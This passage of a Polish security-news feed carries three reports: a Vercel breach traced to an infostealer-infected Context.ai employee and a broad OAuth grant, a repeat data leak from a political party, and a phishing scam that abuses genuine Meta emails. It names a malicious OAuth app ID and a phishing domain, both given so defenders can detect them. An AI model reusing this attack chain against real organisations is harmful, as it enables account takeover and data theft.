<li><a href="https://x.com/niebezpiecznik/status/2048365051040415805" target="_blank">O tym, że ograniczenie wieku w Australii w dostępie do social mediów nie zadziałało</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2048409777055609281" target="_blank">O teściach w osobnym VLAN-ie</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048454814070079995" target="_blank">O wzrastającej fali ataków fizycznych na kryptowalutowych Francuzów</a> </li>
<li><a href="https://x.com/niebezpiecznik/status/2048461923419648139" target="_blank">O tym, że najsławniejsza zbiórka w polskim internecie (łatwogang) rozłożyła serwery siepomaga</a></li>
</ol>
<p>&nbsp;</p>
<p>Dajcie znać, czy takie podsumowania jak to mają dla Was wartość? Czy mamy je kontynuować? A może wyobrażacie sobie je inaczej? Jeśli tak &#8212; co dodać, co zmienic? </p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!]]></title>
		<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27020</id>
		<updated>2026-04-21T11:40:24Z</updated>
		<published>2026-04-21T11:40:24Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="Contex.ai"/><category scheme="https://niebezpiecznik.pl" term="eskalacja przywilejów"/><category scheme="https://niebezpiecznik.pl" term="Google Workspace"/><category scheme="https://niebezpiecznik.pl" term="infostealer"/><category scheme="https://niebezpiecznik.pl" term="malware"/><category scheme="https://niebezpiecznik.pl" term="SaaS"/><category scheme="https://niebezpiecznik.pl" term="stealer"/><category scheme="https://niebezpiecznik.pl" term="Vercel"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych &#8220;technicznych&#8221; firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/"><![CDATA[<p>Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych &#8220;technicznych&#8221; firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej grupie oraz plujący jadem internetowi przeciwnicy vibecodingu, którzy z widłami poszli na firmę, bo przecież wiadomo, że &#8220;każdy programista AI to debil&#8221;. A okazało się, że AI nie miało z tym atakiem niczego wspólnego.<span id="more-27020"></span></p>
<h3>Od czego się zaczęło?</h3>
<p>19 kwietnia na znanym hackerskim forum pojawiła się informacja o tym, że popularna wśród vibecoderów platforma Vercel została zhackowana. Atakujący podpisujący się jako ShinyHunters wystawili na sprzedaż klucze i dostępy do bazy danych firmy. Zrobiło się gorąco w środowisku, bo Vercel stoi też za narzędziem v0 oraz popularną biblioteką Next.js, a to od razu przywołało <a href="https://niebezpiecznik.pl/tag/supply-chain/" target="_blank">ostatnie głośne ataki supply chain</a>.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked.jpeg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-600x489.jpeg" alt="" width="600" height="489" class="aligncenter size-large wp-image-27021" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-600x489.jpeg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-307x250.jpeg 307w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked.jpeg 739w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Na początku oczywiście spekulowano, że przełamanie zabezpieczeń to wynik użycia beztroskiego vibecodingu do budowy i konfiguracji mechanizmów bezpieczeństwa Vercela. Bo firma z vibecodingiem jest kojarzona. Ale prawda okazała jeszcze bardziej bolesna. Źródłem ataku był łańcuch dwóch pracowników. </p>
<ul>
<li>Pierwszy to pracownik zewnętrznej firmy &#8212; Contex.ai, który pobierał &#8230;cheaty do gry Roblox zainfekowane infostealerem Lumma. Dzięki temu atakujący mieli dostęp do infrastruktury firmy Contex.ai oraz danych jej klientów. Dwa miesiące temu 17 lutego. Poniżej widok tego, co infostealer wystawiał z jego hosta:
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel.png"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-350x241.png" alt="" width="350" height="241" class="aligncenter size-medium wp-image-27022" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-350x241.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-600x412.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-768x528.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel.png 1123w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-231x250.jpg" alt="" width="231" height="250" class="aligncenter size-medium wp-image-27024" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-231x250.jpg 231w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-554x600.jpg 554w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-768x831.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-1420x1536.jpg 1420w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2.jpg 1438w" sizes="auto, (max-width: 231px) 100vw, 231px" /></a>
</li>
<li>Drugi to pracownik Vercela, który korzystał z narzędzi Contex.ai, ale zalogował się do nich ze swojego służbowego konta Google Workspace, dając im poprzez OAuth pełne uprawnienia (&#8220;allow all&#8221;) do środowiska Vercela.</li>
</ul>
<p>Infekcja pierwszego pracownika dała atakującym dostęp do jego uprawnień w różnych usługach (Supabase, Datadog, Authkit) oraz do skrzynki <span class="code">support@contex.ai</span>, dzięki której udało się im &#8220;zpivotować&#8221; do infrastruktury Vercela. Żadnego przejęcia hasła. Żadnego phishingu. Żadnego exploita. Kurtyna. </p>
<div class="info">
<a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/domino-vercel.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/domino-vercel-600x414.jpg" alt="" width="400" height="414" class="aligncenter size-large wp-image-27023" /></a></p>
<p>Jeśli nie chcesz, by jeden nieostrożny pracownik albo błędnie skonfigurowane środowisko pracy rozłożyło Twoją firmę na łopatki, to zapisz swój zespół na nasze <a href="https://niebezpiecznik.pl/web" target="_blank">szkolenie z bezpieczeństwa dla programistów</a> lub <a href="https://niebezpiecznik.pl/net" target="_blank">administratorów</a>! Pokazujemy na takim szkoleniu w praktyce, jakich błędów uniknąć, żeby nie znaleźć się na czołówkach gazet i nie musieć wysyłać zgłoszeń do RODO oraz listów z frazą &#8220;bezpieczeństwo jest dla nas najważniejsze, ale&#8230;&#8221; do Klientów ;)
</div>
<p>Żeby było weselej, grupa ShinyHunters stwierdziła na swoim kanale na Telegramie, że ktoś się pod nich podszywa (zapewne aby podnieść wiarygodność swojego ogłoszenia) a oni żadnych dostępów do Vercela nie sprzedają. </p>
<h3>Jak sprawdzić, czy nie macie takich pracowników u siebie w firmie?</h3>
<p>Jeśli korzystacie z Google Workspace, sprawdźcie czy też przypadkiem nie macie &#8220;zbyt szerokich dostępów&#8221; wpiętych po OAuth do swojej infrastruktury. W tym celu zaloguj się do panelu Google Admin Console i wejdź w sekcję Security. A potem Access and Data Control -> API Controls -> Manage app access -> <a href="https://admin.google.com/ac/owl/list?tab=apps" target="_blank">Accessed Apps</a>. Tu widać wszystkie aplikacje mające dostęp do Waszego środowiska. Warto sprawdzić, czy nie ma wśród nich dokładnie tej, która &#8220;zhackowała&#8221; Vercela. Aby to zrobić, wystarczy przefiltrować listę po ID aplikacji: </p>
<p><code>"110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent[.]com"</code></p>
<p>Jeśli zobaczysz tę aplikację na liście &#8212; oznacza to, że Twój firmowy Workspace może mieć nieproszonych gości. Należy niezwłocznie usunąć dostępy, rozpocząć procedurę analizy logów audytowych i zrotować adekwatne tokeny i hasła.</p>
<blockquote><p>Może warto też na przyszłość ograniczyć możliwość uwierzytelniania się po OAuth niektórym pracownikom/aplikacjom? Jest więcej niż pewne, że Wasi współpracownicy korzystają z kont służbowych do logowania się w usługach firm trzecich, zostawiając tam tokeny, które mogą dać komuś dostęp do Waszej infrastruktury&#8230; Nie mówiąc już o naruszeniach umów o poufność i wysyłaniu danych osobowych poza EOG. Jeśli zarządzasz IT w jakiejś firmie, warto to (i nie tylko to) ryzyko zaadresować jak najszybciej, a my możemy w tym pomóc. Jeśli nie wiesz od czego zacząć albo jak poprawnie ułożyć cyberbezpieczeństwo w firmie od zera, <a href="mailto:cso@niebezpiecznik.pl" target="_blank">daj nam znać &#8212; pomożemy</a>!</p></blockquote>
<p>A jeśli korzystasz z Vercela, to dobrym pomysłem będzie rotacja wszystkich sekretów, &#8220;sensitive variables&#8221; i rozważenie korzystania z zewnętrznych Secret Managerów na przyszłość. </p>
<h3>Vercel informuje klientów</h3>
<p>W sieci pojawiła się <a href="https://x.com/rauchg/status/2045995362499076169?s=12" target="_blank">wypowiedź</a> CEO Vercela z opisem ich ustaleń. Są też <a href="https://context.ai/security-update" target="_blank">gorzkie słowa</a> ze strony Contex.ai:</p>
<blockquote><p>Vercel is not a Context customer, but it appears that at least one employee enabled “allow all” on all requested Google Workspace permissions using their Vercel Google Workspace account. These permissions were intended to grant AI agents the ability to perform Google Workspace actions such as writing emails or creating documents on the grantee’s behalf.</p></blockquote>
<h3>Nie zwalajcie winy na AI (w tym przypadku)</h3>
<p>Opisywany incydent idealnie wpisuje się w to, co omawialiśmy niedawno w artykule pt. <a href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/" target="_blank">To nie AI jest największym zagrożeniem</a>. Mimo że w nagłówkach portali królują dziś przerażające hasła o &#8220;śmiercionośnych skutkach korzystania z AI&#8221;, to tu wektorem ataku był błąd pracownika (dlatego <a href="https://niebezpiecznik.pl/bpi" target="_blank">warto ich edukować pod kątem dobrych praktyk cyberbezpieczeństwa</a>) &#8212; zaniedbanie, połączone z trywialnym złośliwym oprogramowaniem i brakiem egzekwowania reguły najmniejszych uprawnień (Least Privilege) oraz detekcji tego typu infekcji i braku kontrolowania &#8220;shadow IT / shadow AI&#8221;. </p>
<p>Narzędzia bazujące na sztucznej inteligencji, z których coraz częściej korzystają firmy działają &#8220;w chmurze&#8221; dokładnie tak, jak <em>nieejajowe</em> konta usługowe. I tak samo jak w przypadku wszystkich innych usług firm trzecich, bezwzględnie wymagają pełnej kontroli, audytu logów i zasady ograniczonego zaufania. Tu odsyłany do <a href="https://sklep.niebezpiecznik.pl/s/soc" target="_blank">naszego cyklu poświęconego budowie SOC</a>, który takie nadużycia pomaga wychwytywać.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/#comments" rel="replies" thr:count="9" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/feed/atom/" rel="replies" thr:count="9" type="application/atom+xml"/>
			<thr:total>9</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[&#8220;Ssijcie ruskiego k&#8230;&#8221; czyli partia Mentzena zhackowana po raz 3]]></title>
		<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27007</id>
		<updated>2026-04-20T08:34:44Z</updated>
		<published>2026-04-20T08:16:54Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Hacked!"/><category scheme="https://niebezpiecznik.pl" term="niepełnoletnie"/><category scheme="https://niebezpiecznik.pl" term="Nowa Nadzieja"/><category scheme="https://niebezpiecznik.pl" term="Sławomir Mentzen"/><category scheme="https://niebezpiecznik.pl" term="wyciek danych"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Po raz trzeci dane członków oraz nieletnich sympatyków partii Mentzena zostały wykradzione i upublicznione w sieci. Tym razem włamywacz opublikował 500 rekordów zawierających: imię i nazwisko PESEL adres zamieszkania numery telefonów Wyciekły też dane osób oznaczonych jako &#8220;nieaktywne&#8221; ponieważ wciąż znajdowały się w bazie danych. Dodatkowo upubliczniona paczka zawiera treści SMS-ów, e-maili i dokumentów. To nie [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/"><![CDATA[<p>Po raz trzeci dane członków oraz nieletnich sympatyków partii Mentzena zostały wykradzione i upublicznione w sieci. Tym razem włamywacz opublikował 500 rekordów zawierających:</p>
<ul>
<li>imię i nazwisko
<li>PESEL
<li>adres zamieszkania
<li>numery telefonów
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-600x228.jpg" alt="" width="600" height="228" class="aligncenter size-large wp-image-27009" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-600x228.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-350x133.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-768x292.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-1536x585.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-2048x780.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Wyciekły też dane osób oznaczonych jako &#8220;<strong>nieaktywne</strong>&#8221; ponieważ wciąż znajdowały się w bazie danych. Dodatkowo upubliczniona paczka zawiera treści SMS-ów, e-maili i dokumentów. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-600x542.jpg" alt="" width="600" height="542" class="aligncenter size-large wp-image-27008" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-600x542.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-277x250.jpg 277w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-768x694.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2.jpg 1126w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>To nie pierwszy hack partii Mentzena</h3>
<p>Przypomnijmy, że pierwszy z ataków zakończony wyciekiem danych Nowej Nadziei miał miejsce <strong>16 marca 2025</strong>, <a href="https://niebezpiecznik.pl/post/wyciek-danych-nowa-nadzieja-slawomir-mentzen/" target="_blank">a drugi 4 sierpnia 2025</a>. Partia Mentzena do dziś nie odpowiedziała nam na pytania w sprawie ataków. Można też przypuszczać, że niewiele też poczyniono aby lepiej zabezpieczyć dostęp do danych. </p>
<p>Nie zdziwilibyśmy się, gdyby przyszło nam jeszcze w tym roku, po raz czwarty, opisywać kolejny incydent związany z tą partią&#8230;</p>
<p><a name='akt'></a><br />
<strong class='update'>Aktualizacja (20.04.2026 10:33)</strong><br />
Rzecznik prasowy Nowej Nadziei na Twitterze poinformował, że &#8220;sprawa dotyczy starego, nieaktualnego systemu, dotyczy sekcji młodzieżowej w jednym regionie w Polsce (Białystok)&#8221;.</p>
<h3>Jak uchronić się przed takimi atakami?</h3>
<p>Jeśli chcesz zabezpieczyć się przed atakami na swoje serwery i webaplikacje, zapraszamy na nasze bestsellerowe szkolenie, a raczej <a href="https://niebezpiecznik.pl/net" target="_blank">3 dniowe, pełne praktyki warsztaty, które nauczą Cię jak samodzielnie wykonywać testy penetracyjne</a>. Dzięki niemu wykryjesz dziury w swojej infrastrukturze zanim ktoś zrobi to za Ciebie i opublikuje w internecie dane Twoich klientów lub użytkowników &#8212; oto najbliższe terminy:</p>
<div class="info">
<div><p><b style="color:#f00">Kraków</b>: <strong>13-15 maja 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 10 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gfc">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 1 maja)<br>
                        4444 PLN netto (od 2 maja)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>17-19 czerwca 2026</strong>r. — zostało <strong>6 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 18 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gog">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 8 maja)<br>
                        4444 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>01-03 lipca 2026</strong>r. — zostało <strong>7 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 26 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20fty">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 8 maja)<br>
                        4444 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>26-28 sierpnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20g0n">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 15 maja)<br>
                        4444 PLN netto (od 16 maja)
                        </ul></div>
</div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/#comments" rel="replies" thr:count="13" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/feed/atom/" rel="replies" thr:count="13" type="application/atom+xml"/>
			<thr:total>13</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Naprawdę dobrze dopracowany atak na właścicieli stron na Facebooku]]></title>
		<link href="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26997</id>
		<updated>2026-04-17T09:32:58Z</updated>
		<published>2026-04-17T09:29:42Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Facebook"/><category scheme="https://niebezpiecznik.pl" term="Meta"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="socjotechnika"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Dziś na naszą redakcyjną skrzynkę spłynął ciekawy i &#8212; podkreślmy &#8212; prawdziwy e-mail od Mety, właściciela Facebooka: Wczujcie się w administratora jakiegoś fanpage. E-mail dotyczy blokady strony w ciągu 24 godzin. E-mail jest wysłany z prawdziwego adresu i nie wpada do spamu. E-mail trafia na adres przypisany do danego fanpage (atakujący nie zna tego adresu, wiadomość wysyła Facebook [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/"><![CDATA[<p>Dziś na naszą redakcyjną skrzynkę spłynął ciekawy i &#8212; podkreślmy &#8212; prawdziwy e-mail od Mety, właściciela Facebooka: </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-527x600.jpg" alt="" width="527" height="600" class="aligncenter size-large wp-image-26998" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-527x600.jpg 527w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-219x250.jpg 219w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-768x875.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-1348x1536.jpg 1348w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1.jpg 1378w" sizes="auto, (max-width: 527px) 100vw, 527px" /></a></p>
<p>Wczujcie się w administratora jakiegoś fanpage. E-mail dotyczy blokady strony w ciągu 24 godzin. E-mail jest wysłany z prawdziwego adresu i nie wpada do spamu. E-mail trafia na adres przypisany do danego fanpage (atakujący nie zna tego adresu, wiadomość wysyła Facebook na niepubliczny e-mail podany przez administratora strony). Ten atak jest &#8212; przynajmniej na tym etapie bardzo wiarygodny.</p>
<p>Ale to jest przekręt. </p>
<p>Atakujący sprytnie wykorzystuje to, że Facebook rzeczywiście wysyła takie maile w momencie prośby o dostęp do czyjegoś Business Portfolio. Co więcej, umożliwia wplecenie w nie fragmentów tekstu kontrolowanego przez atakującego, i jak widać powyżej, nie oznacza wyraźnie, które z fragmentów są dodane przez wnioskującego o dostęp. </p>
<p>Czy jesteście w stanie ustalić samodzielnie, które fragmenty e-maila to treść podstawiona przez atakującego? </p>
<h3>Co się stanie, jeśli ktoś kliknie w link?</h3>
<p>Kliknięcie w pierwszy z linków spowoduje przeniesienie ofiary na stronę wyglądem przypominającą serwisy Mety i zawierającą formularz, który wyłudza dane osobowe oraz login i hasło. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2-600x420.jpg" alt="" width="600" height="420" class="aligncenter size-large wp-image-27002" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2-600x420.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2-350x245.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2-768x538.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2.jpg 1486w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3-316x250.jpg" alt="" width="316" height="250" class="aligncenter size-medium wp-image-27001" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3-316x250.jpg 316w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3-600x475.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3-768x608.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3.jpg 1162w" sizes="auto, (max-width: 316px) 100vw, 316px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4-304x250.jpg" alt="" width="304" height="250" class="aligncenter size-medium wp-image-27000" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4-304x250.jpg 304w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4-600x493.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4-768x631.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4.jpg 1122w" sizes="auto, (max-width: 304px) 100vw, 304px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5-305x250.jpg" alt="" width="305" height="250" class="aligncenter size-medium wp-image-26999" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5-305x250.jpg 305w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5-600x491.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5-768x629.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5.jpg 1124w" sizes="auto, (max-width: 305px) 100vw, 305px" /></a></p>
<p>Jeśli ktoś uzupełni te dane, bo uwierzy w treść autentycznego (!) e-maila od Facebooka, to straci swoje konto.</p>
<p>Na koniec dodajmy, że domena używana do tego ataku zostałą założona dziś i jest schowana za Cloudflare: </p>
<p><code>Domain Name: INFORMATION-CENTER-ONLINE.HELP (188.114.96.11, 188.114.97.11)<br />
Creation Date: 2026-04-17T04:45:53.0Z<br />
Name Server: ALEENA.NS.CLOUDFLARE.COM<br />
Name Server: VICKY.NS.CLOUDFLARE.COM</code></p>
<h3>Co robić, jak żyć?</h3>
<p>Ostrzeżcie przed tymi e-mailami swoich kolegów i koleżanki z firmowych zespołów social media i wszystkich znajomych, którzy prowadzą fanpages na Facebooku. Wyślijcie im linka do tego posta &#8212; no i <a href="https://facebook.com/niebezpiecznik" target="_blank">do naszego Facebooka też</a> :) A jeśli chcecie przeszkolić swoich pracowników z cyberbezpieczeństwa, aby takie &#8212; i jeszcze bardziej zaawansowane ataki wykrywali sami &#8212; to <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-swojej-firmy/" target="_blank">rzućcie okiem na tematy naszych cyberwykładów</a> z którymi możemy przyjechać do Waszej firmy albo na Wasz wyjazd integracyjny :)</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/#comments" rel="replies" thr:count="19" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/feed/atom/" rel="replies" thr:count="19" type="application/atom+xml"/>
			<thr:total>19</thr:total>
			</entry>
		<entry>
		<author>
			<name>Marcin Maj</name>
